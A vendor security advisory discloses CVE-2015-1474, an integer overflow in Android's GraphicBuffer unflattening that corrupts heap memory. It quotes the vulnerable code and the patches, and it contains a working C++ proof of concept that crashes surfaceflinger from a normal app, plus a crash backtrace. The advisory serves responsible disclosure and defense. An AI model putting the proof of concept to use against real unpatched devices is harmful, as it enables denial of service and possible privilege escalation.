#############################################################################
#
#   QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
#
#############################################################################
#
# CVE ID:   CVE-2015-1474
# Product:   Android
# Vendor:   Google
# Subject:   Integer overflow leading to heap corruption while unflattening
GraphicBuffer
# Effect:  Gain privileges or cause a denial of service
# Author:  Guang Gong

# Date:     March 11th 2015
#
#############################################################################


Introduction
------------
Multiple integer overflows in the GraphicBuffer::unflatten function in
platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0
allow attackers to gain privileges or cause a denial of service (memory
corruption) via vectors that trigger a large number of (1) file descriptors
or (2) integer values.

Affected Android version
----------

all versions below Lollipop 5.1

Patches
-------

Android Bug id 18076253
There are two patches for this vulnerabilities, the first patch for this
issue is uncomplete.

[1]
https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2

[2]
https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43

Description
-----------
The vulnerable code is as follows.

28
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28>
native_handle_t
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>*
native_handle_create
<http://androidxref.com/4.4.4_r1/s?refs=native_handle_create&project=system>
(int numFds <http://androidxref.com/4.4.4_r1/s?refs=numFds&project=system>,
int numInts <http://androidxref.com/4.4.4_r1/s?refs=numInts&project=system>)

29
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#29>
{

30
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#30>
   native_handle_t
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>* h =
malloc <http://androidxref.com/4.4.4_r1/s?defs=malloc&project=system>(

31
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#31>
           sizeof(native_handle_t
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>) +
sizeof(int)*(numFds
<http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>+numInts
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
));---------------> integer overflow here, numFds and numInts can be
controlled by normal Apps.

32
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#32>

33
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#33>
   h->version
<http://androidxref.com/4.4.4_r1/s?defs=version&project=system> = sizeof(
native_handle_t
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>);

34
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#34>
   h->numFds <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>
= numFds <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>;

35
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#35>
   h->numInts
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
= numInts
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
;

36
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#36>
   return h;

37
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#37>
}



244
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#244>
status_t
<http://androidxref.com/4.4.4_r1/s?defs=status_t&project=frameworks>
GraphicBuffer
<http://androidxref.com/4.4.4_r1/s?defs=GraphicBuffer&project=frameworks>::
unflatten
<http://androidxref.com/4.4.4_r1/s?refs=unflatten&project=frameworks>(

245
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#245>
       void const*& buffer
<http://androidxref.com/4.4.4_r1/s?defs=buffer&project=frameworks>, size_t
<http://androidxref.com/4.4.4_r1/s?defs=size_t&project=frameworks>& size
<http://androidxref.com/4.4.4_r1/s?defs=size&project=frameworks>, int const
*& fds <http://androidxref.com/4.4.4_r1/s?defs=fds&project=frameworks>,
size_t <http://androidxref.com/4.4.4_r1/s?defs=size_t&project=frameworks>&
count
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#count>)
{

…

271
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#271>
       native_handle
<http://androidxref.com/4.4.4_r1/s?defs=native_handle&project=frameworks>*
h = native_handle_create
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_create&project=frameworks>
(numFds
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>
, numInts
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numInts>
);

272
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#272>
       memcpy
<http://androidxref.com/4.4.4_r1/s?defs=memcpy&project=frameworks>(h->data
<http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks>,       fds
<http://androidxref.com/4.4.4_r1/s?defs=fds&project=frameworks>, numFds
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>
*sizeof(int));    ---------------->heap corruption hear.

273
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#273>
       memcpy
<http://androidxref.com/4.4.4_r1/s?defs=memcpy&project=frameworks>(h->data
<http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks> + numFds
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>,
&buf <http://androidxref.com/4.4.4_r1/s?defs=buf&project=frameworks>[8],
numInts
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numInts>
*sizeof(int));

….


Attack vector
-------------
A normal Apps can corrupt the heap in surfaceflinger and system_server by
this vulnerabilities.

the PoC of corrupting the heap of surfaceflinger is as follows

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <utils/Log.h>

#include <binder/IPCThreadState.h>

#include <binder/ProcessState.h>

#include <binder/IServiceManager.h>

#include <gui/ISurfaceComposer.h>

#include <gui/BufferQueue.h>

#include <gui/CpuConsumer.h>

#include <unistd.h>


using namespace android;

class MyBufferQueue:public BufferQueue{

   public:

       status_t onTransact(uint32_t code, const Parcel& data, Parcel*
reply, uint32_t flags){

           status_t ret =
BnGraphicBufferProducer::onTransact(code,data,reply,flags);

           if(code==1){

               int *data = (int *)reply->data();

               int *numFDs = data+9;

               *numFDs=0xfffffffd;

           }

           return ret;

       }

};

int main()

{

   sp<ProcessState> proc(ProcessState::self());

   proc->startThreadPool();

   const String16 name("SurfaceFlinger");

   sp<ISurfaceComposer> composer;

   getService(name, &composer);

   uint32_t w, h;

   PixelFormat f;

   sp<IBinder>
display(composer->getBuiltInDisplay(ISurfaceComposer::eDisplayIdMain));

   sp<MyBufferQueue> bufferQueue = new MyBufferQueue();

   sp<CpuConsumer> cpuConsumer = new CpuConsumer(bufferQueue, 1);

   status_t err = composer->captureScreen(display, bufferQueue, 0,0,0,-1UL);

   if (err != NO_ERROR) {

       fprintf(stderr, "screen capture failed: %s\n", strerror(-err));

       exit(0);

   }

   printf("screen capture success\n");

   IPCThreadState::self()->joinThreadPool();

   return 0;

}

How to corrupt the heap of system_server

put a malformated GraphicBuffer in a Bundle, and then send it to
system_server via setApplicationRestrictions. it’s the same way as
CVE-2014-7911.

The backtrace of crash surfaceflinger

55 --------- beginning of crash

 56 F/libc    (15504): Fatal signal 11 (SIGSEGV), code 1, fault addr
0xb1000000 in tid 15504 (surfaceflinger)

 57 I/DEBUG   (  180): *** *** *** *** *** *** *** *** *** *** *** *** ***
*** *** ***

 58 I/DEBUG   (  180): Build fingerprint:
'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'

 59 I/DEBUG   (  180): Revision: '11'

 60 I/DEBUG   (  180): ABI: 'arm'

 61 I/DEBUG   (  180): pid: 15504, tid: 15504, name: surfaceflinger  >>>
/system/bin/surfaceflinger <<<

 62 I/DEBUG   (  180): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault
addr 0xb1000000

 63 W/NativeCrashListener(15836): Couldn't find ProcessRecord for pid 15504

 64 I/DEBUG   (  180):     r0 b1000000  r1 b6be41ec  r2 ff81eff0  r3
00000004

 65 E/DEBUG   (  180): AM write failure (32 / Broken pipe)

 66 I/DEBUG   (  180):     r4 b647ac00  r5 fffffffd  r6 b6302150  r7
00000050

 67 I/DEBUG   (  180):     r8 bef65734  r9 bef65738  sl bef6573c  fp
b081f070

 68 I/DEBUG   (  180):     ip 80000000  sp bef656f0  lr b6c6cfb7  pc
b6eb2e30  cpsr a00f0030

 69 I/DEBUG   (  180):

 70 I/DEBUG   (  180): backtrace:

 71 I/DEBUG   (  180):     #00 pc 0000fe30  /system/lib/libc.so
(__memcpy_base+91)   ------------------------->memcpy cause heap corruption

 72 I/DEBUG   (  180):     #01 pc 00005fb3  /system/lib/libui.so
(android::GraphicBuffer::unflatten(void const*&, unsigned int&, int
const*&, unsigned int&)+98)

 73 I/DEBUG   (  180):     #02 pc 00025e09  /system/lib/libgui.so

 74 I/DEBUG   (  180):     #03 pc 0001e985  /system/lib/libbinder.so
(android::Parcel::read(android::Parcel::FlattenableHelperInterface&)
const+176)

 75 I/DEBUG   (  180):     #04 pc 0002638d  /system/lib/libgui.so

 76 I/DEBUG   (  180):     #05 pc 0002adc3  /system/lib/libgui.so
(android::Surface::dequeueBuffer(ANativeWindowBuffer**, int*)+226)

 77 I/DEBUG   (  180):     #06 pc 0002aa81  /system/lib/libgui.so
(android::Surface::hook_dequeueBuffer_DEPRECATED(ANativeWindow*,
ANativeWindowBuffer**)+32)

 78 I/DEBUG   (  180):     #07 pc 000175cf  /system/lib/libsurfaceflinger.so

 79 I/DEBUG   (  180):     #08 pc 0001b80f  /system/lib/libsurfaceflinger.so

 80 I/DEBUG   (  180):     #09 pc 000158f5  /system/lib/libsurfaceflinger.so

 81 I/DEBUG   (  180):     #10 pc 00010907  /system/lib/libutils.so
(android::Looper::pollInner(int)+410)

 82 I/DEBUG   (  180):     #11 pc 000109f9  /system/lib/libutils.so
(android::Looper::pollOnce(int, int*, int*, void**)+92)

 83 I/DEBUG   (  180):     #12 pc 00015ad1  /system/lib/libsurfaceflinger.so

 84 I/DEBUG   (  180):     #13 pc 0001675d
 /system/lib/libsurfaceflinger.so (android::SurfaceFlinger::run()+8)

 85 I/DEBUG   (  180):     #14 pc 0000083d  /system/bin/surfaceflinger

 86 I/DEBUG   (  180):     #15 pc 0000f811  /system/lib/libc.so
(__libc_init+44)

 87 I/DEBUG   (  180):     #16 pc 000008d8  /system/bin/surfaceflinger

 88 I/DEBUG   (  180):

 89 I/DEBUG   (  180): Tombstone written to: /data/tombstones/tombstone_01

 90 I/BootReceiver(15836): Copying /data/tombstones/tombstone_01 to DropBox
(SYSTEM_TOMBSTONE)

 91 I/ServiceManager(  176): service 'SurfaceFlinger' died

 92 I/ServiceManager(  176): service 'display.qservice' died



Milestones
----------

Date

Comment

Sender

20/10/2014

Initial Report of CVE-2015-1474

Qihoo 360

22/10/2014

Forwarded to the dedicated Team by Google

Google

04/11/2014

Classified it as a high severity vulnerability

Google

06/11/2014

Get the Android Bug ID 18076253

Google

10/2/2015

Notify it’s fixed and send the CVE-ID

Google

16/2/2015

Tell Google the first patch was uncomplete

Qihoo 360

18/2/2015

Submitted the second patch

Google

11/3/2015

Lollipop 5.1 was released, disclose it

Qihoo 360



References
----------
[1]
https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2

[2]
https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43

[3]https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1474

[4]
http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28